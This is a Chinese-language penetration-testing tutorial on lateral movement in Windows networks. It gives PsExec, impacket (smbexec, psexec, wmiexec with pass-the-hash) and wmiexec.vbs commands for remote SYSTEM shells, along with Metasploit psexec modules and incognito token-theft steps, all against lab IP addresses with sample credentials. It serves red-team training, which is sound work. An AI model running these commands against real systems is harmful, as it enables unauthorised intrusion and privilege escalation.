使用外部工具横向移动

Smbexe、Psexec

Psexec

PsExec是一种轻巧的telnet代替品，可让您在其他系统上执行进程，并为控制台应用提供完整的交互性，无需手动安装客户端软件。

原理：

1、ipc$连接，释放Psexesvc.exe

2、OpenSCManager打开受害者机器上服务控制管理器的句柄

3、CreateService创建服务

4、获取服务句柄OpenService使用StartService启动服务

建立IPC连接，无需输入密码

net use  \\IP  /user:用户名  密码

反弹cmd

psexec.exe  \\192.168.222.135  -s cmd.exe  -acceptcula

执行命令：

psexec.exe  \\192.168.222.135  whoami  -acceptcula

若没有建立ipc连接则需要使用参数连接

psexec.exe  \\192.168.222.150  -u Administrator -p hjw123...  -s  cmd.exe

-acceptcula是指第一次运行psexec会弹出确认框，使用该参数就不会弹出确认框。-s是指以System权限运行远程进程，获得一个System权限的交互式Shell。如果不使用该参数，会获得一个Administrator权限的shell。

Smbexec

smbexec是一款基于psexec的域渗透测试工具

工具集合：impacket/examples at master · fortra/impacket · GitHub

操作：

1、安装依赖

python -m pip install impacket

2、运行smbexec.py

python smbexec.py 用户名:密码@ip地址
python smbexec.py web2/Administrator:[email protected]

3、还可以运行psexec.py，这里与官方的不同就是可以将痕迹进行清除

python psexec.py 用户名:密码@ip地址
python psexec.py web2/Administrator:[email protected]

Wmiexec

1、使用wmiexec.py脚本

python wmiexec.py 用户名:密码@ip
python wmiexec.py Administrator:[email protected]

2、cscript + wmiexec .vbs脚本实现psexec功能

cscript  //nologo  wmiexec.vbs  /shell  ip  用户名  密码
cscript  //nologo  wmiexec.vbs  /shell  192.168.222.135 Administrator hjw123..

解释：这里nologo参数是用来不需要弹窗的

这里也可以执行单条命令

拓展：wmiexec.py脚本还支持通过hash传递获得shell

python3 wmiexec.py -hashes LMHash:NTHash 域名/用户名@目标IP

Metasploit

1、psexec_command

auxiliary/admin/smb/psexec_command

2、psexec

exploit/windows/smb/psexec 

3、Token窃取

在Metasploit中，可以使用incognito实现token窃取，Metasploit中的incognito，是从windows平台下的incognito移植过来的

//加载incognito模块
load  incognito

//提升权限
getsystem

//列举token
list_tokens -u

//token窃取
impersonate_token  "NT AUTHORITY\\SYSTEM"

//从进程窃取token
steal_token 4567

//返回之前的token
drop_token

token简介：

Windows 的 AccessToken 有两种类型：

• Delegation Token：授权令牌，它支持交互式会话登录 (例如本地用户直接 登录、远程桌面登录访问)
• Impresonation Token：模拟令牌，它是非交互的会话 (例如使用 net use 访问共享文件夹)。